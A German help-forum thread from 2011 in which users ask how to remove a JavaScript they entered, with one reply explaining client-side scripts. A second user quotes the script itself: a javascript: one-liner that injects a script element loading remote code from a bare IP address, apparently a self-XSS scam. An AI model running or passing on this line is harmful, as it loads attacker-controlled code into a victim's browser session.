Frage von Art957 18.04.2011

JavaScript entfernen,aber wie?

  • Hilfreichste Antwort von MEGACHELTERRAR 19.04.2011
    2 Mitglieder fanden diese Antwort hilfreich

    Also, JavaScript ist so schonmal nicht serverseitig, d.h u.a., dass das, was du da eingibst, soweit das manuell möglich ist, nur für den aktuellen Seitenaufruf zählt.

     

    Wäre es denn möglich dieses Script mal hier zu posten oder mal einen Artikel oder so zu nennen, welcher über diesen Script ist?

     

    Wie lang ist denn der Script? Weil ein Script allein, kann eigentlich normalerweise kein Virus sein...

  • Antwort von Daquest 21.04.2011

    So, Tag auch , habe ganz genau das gleiche problem und bitte ebenfalls um hilfe und PS: hier der script möchte nämlich auch wissen wie man dieses blöde script entefernt:

    javascript:(a=(b=document).createElement('script')).src='//216.119.153.147/german2.php?'+Math.random(),b.body.appendChild(a);void(0)

Du kennst die Antwort? Frage beantworten
Bitte noch eine Antwort ... Frage erneut stellen

Verwandte Fragen

Fragen Sie die Community –

anonym und kostenlos!